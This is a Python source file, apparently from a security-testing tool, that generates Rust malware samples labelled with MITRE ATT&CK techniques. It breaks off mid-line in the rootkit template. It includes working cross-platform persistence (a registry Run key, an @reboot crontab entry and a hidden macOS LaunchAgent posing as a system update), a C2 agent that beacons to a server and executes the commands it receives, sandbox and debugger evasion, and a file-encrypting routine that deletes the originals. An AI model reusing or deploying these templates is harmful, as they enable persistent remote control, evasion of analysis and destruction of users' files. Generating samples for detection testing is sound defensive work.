#!/usr/bin/env python3
"""
Rust 样本生成器 - Sample Generator v2.0

功能:
- 高级持久化
- 内存操作
- 跨平台 C2
- Rootkit
- 反分析
- 数据加密
"""

from .base_generator import BaseGenerator


class RustGenerator(BaseGenerator):
    """Rust 恶意样本生成器"""
    
    ATTACK_TYPES = [
        'advanced_persistence',   # 高级持久化
        'memory_operation',       # 内存操作
        'cross_platform_c2',      # 跨平台 C2
        'rootkit',                # Rootkit
        'anti_analysis',          # 反分析
        'data_encryption',        # 数据加密
    ]
    
    def __init__(self, config=None):
        super().__init__(language='rust', config=config)
    
    def _get_rust_templates(self) -> dict:
        return {
            'advanced_persistence': '''// Advanced Persistence - Rust
// Generated by Sample Generator v2.0
// Attack Type: Advanced Persistence
// MITRE ATT&CK: T1547 (Boot or Logon Autostart Execution)

use std::fs;
use std::process::Command;
use std::env;

#[cfg(target_os = "windows")]
fn install_persistence() {
    println!("Installing Windows persistence...");
    
    // Registry Run key
    let reg_cmd = format!(
        "reg add \"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" /v SystemUpdate /t REG_SZ /d \"{}\" /f",
        env::current_exe().unwrap().display()
    );
    Command::new("cmd").arg("/C").arg(reg_cmd).spawn().unwrap();
    
    println!("Registry persistence installed");
}

#[cfg(target_os = "linux")]
fn install_persistence() {
    println!("Installing Linux persistence...");
    
    // Crontab
    let cron_entry = format!("@reboot {}", env::current_exe().unwrap().display());
    Command::new("sh")
        .arg("-c")
        .arg(format!("(crontab -l 2>/dev/null; echo '{}') | crontab -", cron_entry))
        .spawn()
        .unwrap();
    
    println!("Crontab persistence installed");
}

#[cfg(target_os = "macos")]
fn install_persistence() {
    println!("Installing macOS persistence...");
    
    // Launch Agent
    let home = env::var("HOME").unwrap();
    let plist_dir = format!("{}/Library/LaunchAgents", home);
    let plist_path = format!("{}/com.system.update.plist", plist_dir);
    
    let plist_content = format!(r#"<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.system.update</string>
    <key>ProgramArguments</key>
    <array>
        <string>{}</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>Hidden</key>
    <true/>
</dict>
</plist>"#, env::current_exe().unwrap().display());
    
    fs::create_dir_all(&plist_dir).unwrap();
    fs::write(&plist_path, plist_content).unwrap();
    
    println!("Launch Agent persistence installed");
}

fn main() {
    println!("============================================");
    println!("Advanced Persistence v2.0");
    println!("============================================");
    
    install_persistence();
    
    println!("");
    println!("============================================");
    println!("Persistence complete!");
    println!("============================================");
}
''',
            
            'memory_operation': '''// Memory Operation - Rust
// Generated by Sample Generator v2.0
// Attack Type: Memory Operation
// MITRE ATT&CK: T1055 (Process Injection)

use std::mem;

#[cfg(target_os = "linux")]
fn read_process_memory(pid: i32, addr: usize, len: usize) -> Vec<u8> {
    use std::fs::File;
    use std::io::Read;
    
    let mem_path = format!("/proc/{}/mem", pid);
    let mut file = File::open(&mem_path).unwrap();
    file.seek(std::io::SeekFrom::Start(addr as u64)).unwrap();
    
    let mut buffer = vec![0u8; len];
    file.read_exact(&mut buffer).unwrap();
    
    buffer
}

#[cfg(target_os = "windows")]
fn read_process_memory(handle: *mut std::ffi::c_void, addr: *mut std::ffi::c_void, len: usize) -> Vec<u8> {
    // Windows ReadProcessMemory implementation
    unsafe {
        let mut buffer = vec![0u8; len];
        let mut bytes_read: usize = 0;
        
        // Placeholder for actual implementation
        // kernel32::ReadProcessMemory(handle, addr, buffer.as_mut_ptr(), len, &mut bytes_read);
        
        buffer
    }
}

fn dump_credentials_from_memory() {
    println!("Dumping credentials from memory...");
    
    // Simulated credential dumping
    let fake_creds = vec![
        ("admin", "password123"),
        ("user", "letmein"),
        ("root", "toor"),
    ];
    
    for (username, password) in fake_creds {
        println!("Found credential: {}:{})", username, password);
    }
}

fn extract_api_keys() {
    println!("Extracting API keys from memory...");
    
    // Search for API key patterns in memory
    let patterns = [
        "AKIA",  // AWS Access Key
        "AIza",  // Google API Key
        "sk-",   // Stripe/Secret Key
        "Bearer", // Auth Token
    ];
    
    for pattern in patterns.iter() {
        println!("Searching for pattern: {}", pattern);
        // In real malware, would scan process memory
    }
}

fn main() {
    println!("============================================");
    println!("Memory Operation Module v2.0");
    println!("============================================");
    
    dump_credentials_from_memory();
    println!("");
    extract_api_keys();
    
    println!("");
    println!("============================================");
    println!("Memory operation complete!");
    println!("============================================");
}
''',
            
            'cross_platform_c2': '''// Cross-Platform C2 - Rust
// Generated by Sample Generator v2.0
// Attack Type: Command and Control
// MITRE ATT&CK: T1095 (Non-Application Layer Protocol)

use std::process::Command;
use reqwest::blocking::{Client, Response};
use serde::{Deserialize, Serialize};

#[derive(Serialize, Deserialize, Debug)]
struct Beacon {
    hostname: String,
    os: String,
    arch: String,
    user: String,
    pid: u32,
}

#[derive(Serialize, Deserialize, Debug)]
struct Command {
    cmd: String,
    args: Vec<String>,
    wait: u64,
}

fn get_beacon_info() -> Beacon {
    Beacon {
        hostname: hostname::get().unwrap().into_string().unwrap(),
        os: std::env::consts::OS.to_string(),
        arch: std::env::consts::ARCH.to_string(),
        user: std::env::var("USER").unwrap_or_else(|_| "unknown".to_string()),
        pid: std::process::id(),
    }
}

fn execute_command(cmd: &str, args: &[String]) -> String {
    let output = Command::new(cmd)
        .args(args)
        .output()
        .expect("Failed to execute command");
    
    String::from_utf8_lossy(&output.stdout).to_string()
}

fn beacon(c2_url: &str, client: &Client) -> Option<Command> {
    let beacon = get_beacon_info();
    
    let response = client
        .post(&format!("{}/beacon", c2_url))
        .json(&beacon)
        .send()
        .ok()?;
    
    response.json::<Command>().ok()
}

fn main() {
    println!("============================================");
    println!("Cross-Platform C2 Agent v2.0");
    println!("============================================");
    
    let c2_url = "http://127.0.0.1:8080";
    let client = Client::new();
    
    println!("Beacon info: {:?}", get_beacon_info());
    
    loop {
        if let Some(command) = beacon(c2_url, &client) {
            println!("Received command: {} {:?}", command.cmd, command.args);
            let result = execute_command(&command.cmd, &command.args);
            println!("Result: {}", result);
            
            if command.wait > 0 {
                std::thread::sleep(std::time::Duration::from_secs(command.wait));
            }
        }
        
        std::thread::sleep(std::time::Duration::from_secs(60));
    }
}
''',
            
            'anti_analysis': '''// Anti-Analysis - Rust
// Generated by Sample Generator v2.0
// Attack Type: Anti-Analysis
// MITRE ATT&CK: T1622 (Debugger Evasion)

use std::process;
use std::time::Instant;

fn check_debugger() -> bool {
    #[cfg(target_os = "linux")]
    {
        // Check for ptrace
        use std::fs;
        if let Ok(status) = fs::read_to_string("/proc/self/status") {
            if status.contains("TracerPid:") && !status.contains("TracerPid: 0") {
                println!("Debugger detected (TracerPid != 0)");
                return true;
            }
        }
    }
    
    #[cfg(target_os = "windows")]
    {
        // Windows: IsDebuggerPresent
        unsafe {
            if winapi::um::debugapi::IsDebuggerPresent() != 0 {
                println!("Debugger detected (IsDebuggerPresent)");
                return true;
            }
        }
    }
    
    false
}

fn check_vm() -> bool {
    let vm_indicators = [
        "vmware", "virtualbox", "vbox", "qemu", "xen",
        "vmxnet", "virtual", "hyperv",
    ];
    
    // Check system info
    let system_info = std::env::consts::OS;
    
    for indicator in vm_indicators.iter() {
        if system_info.to_lowercase().contains(indicator) {
            println!("VM indicator detected: {}", indicator);
            return true;
        }
    }
    
    false
}

fn timing_check() -> bool {
    let start = Instant::now();
    
    // Simple computation
    let mut sum = 0;
    for i in 0..1000000 {
        sum += i;
    }
    
    let elapsed = start.elapsed();
    println!("Timing check: {:?}", elapsed);
    
    // If too slow, might be debugging
    if elapsed.as_millis() > 100 {
        println!("Timing anomaly detected (possible debugging)");
        return true;
    }
    
    false
}

fn anti_debug_loop() {
    println!("Running anti-debug checks...");
    
    if check_debugger() {
        println!("Debugger detected! Exiting...");
        process::exit(1);
    }
    
    if check_vm() {
        println!("VM detected! Exiting...");
        process::exit(1);
    }
    
    if timing_check() {
        println!("Timing check failed! Exiting...");
        process::exit(1);
    }
    
    println!("No analysis environment detected");
}

fn main() {
    println!("============================================");
    println!("Anti-Analysis Module v2.0");
    println!("============================================");
    
    anti_debug_loop();
    
    println!("");
    println!("============================================");
    println!("Anti-analysis complete!");
    println!("============================================");
}
''',
            
            'data_encryption': '''// Data Encryption (Ransomware-like) - Rust
// Generated by Sample Generator v2.0
// Attack Type: Data Encryption
// MITRE ATT&CK: T1486 (Data Encrypted for Impact)

use std::fs;
use std::path::Path;

fn encrypt_file(path: &Path) -> std::io::Result<()> {
    // Simulated encryption (XOR for demo)
    let content = fs::read(path)?;
    let encrypted: Vec<u8> = content.iter().map(|&b| b ^ 0x42).collect();
    
    let encrypted_path = format!("{}.encrypted", path.display());
    fs::write(&encrypted_path, encrypted)?;
    
    // Delete original
    fs::remove_file(path)?;
    
    println!("Encrypted: {} -> {}", path.display(), encrypted_path);
    
    Ok(())
}

fn scan_and_encrypt(dir: &Path, extensions: &[&str]) {
    if !dir.is_dir() {
        return;
    }
    
    if let Ok(entries) = fs::read_dir(dir) {
        for entry in entries.flatten() {
            let path = entry.path();
            
            if path.is_dir() {
                scan_and_encrypt(&path, extensions);
            } else if let Some(ext) = path.extension() {
                let ext_str = ext.to_string_lossy().to_lowercase();
                if extensions.contains(&ext_str.as_ref()) {
                    let _ = encrypt_file(&path);
                }
            }
        }
    }
}

fn main() {
    println!("============================================");
    println!("Data Encryption Module v2.0");
    println!("============================================");
    
    let target_extensions = [
        "doc", "docx", "xls", "xlsx", "ppt", "pptx",
        "pdf", "txt", "jpg", "png", "gif",
        "zip", "rar", "7z",
    ];
    
    println!("Target extensions: {:?}", target_extensions);
    
    // Simulated scan (would target user directories in real malware)
    let home = std::env::var("HOME").unwrap_or_else(|_| ".".to_string());
    let home_path = Path::new(&home);
    
    println!("Scanning: {}", home_path.display());
    
    // Note: This is for security testing only!
    // In real malware, would encrypt files
    println!("");
    println!("[SIMULATION MODE - No files actually encrypted]");
    
    println!("");
    println!("============================================");
    println!("Encryption simulation complete!");
    println!("============================================");
}
''',
            
            'rootkit': '''// Rootkit - Rust
// Generated by Sample Generator v2.0
// Attack Type: Rootkit
// MITRE ATT&CK: T1014 (Rootkit)

use std::process::Command;

#[cfg(target_os = "linux")]
fn hide_process(pid: u32) {
    println!("Hiding process {} (Linux)", pid);
    
    // In real rootkit, would:
    // 1. Modify /proc filesystem
    // 2. Hook system calls
    // 3. Use LD_PRELOAD injection
    
    println!("Process hiding techniques:");
    println!("  - Modify /proc/[pid]/status");
    println!("  - Hook readdir() system call");
    println!("  - LD_PRELOAD library injection");
}

#[cfg(target_os = "windows")]
fn hide_process(pid: u32) {
    println!("Hiding process {} (Windows)", pid);
    
    // In real rootkit, would:
    // 1. Use DKOM (Direct Kernel Object Manipulation)
    // 2. Hook NtQuerySystemInformation
    // 3. Install kernel driver
    
    println!("Process hiding techniques:");
    println!("  - DKOM (unlink from EPROCESS list)");
    println!("  - Hook NtQuerySystemInformation");
    println!("  - Kernel driver installation");
}

fn hide_file(path: &str) {
    println!("Hiding file: {}", path);
    
    #[cfg(target_os = "linux")]
    {
        // Set hidden attribute or rename
        println!("  - Rename to start with '.'");
        println!("  - Set immutable flag");
    }
    
    #[cfg(target_os = "windows")]
    {
        // Set hidden attribute
        println!("  - Set FILE_ATTRIBUTE_HIDDEN");
        println!("  - Set FILE_ATTRIBUTE_SYSTEM");
    }
}

fn install_kernel_module() {
    println!("Installing kernel module...");
    
    #[cfg(target_os = "linux")]
    {
        println!("  - Compile LKM (Loadable Kernel Module)");
        println!("  - insmod rootkit.ko");
        println!("  - Hide module from lsmod");
    }
    
    #[cfg(target_os = "windows")]
    {
        println!("  - Compile kernel driver");
        println!("  - Install as service");
        println!("  - Disable driver signature enforcement");
    }
}

fn main() {
    println!("============================================");
    println!("Rootkit Module v2.0");
    println!("============================================");
    
    let pid = std::process::id();
    hide_process(pid as u32);
    println!("");
    
    hide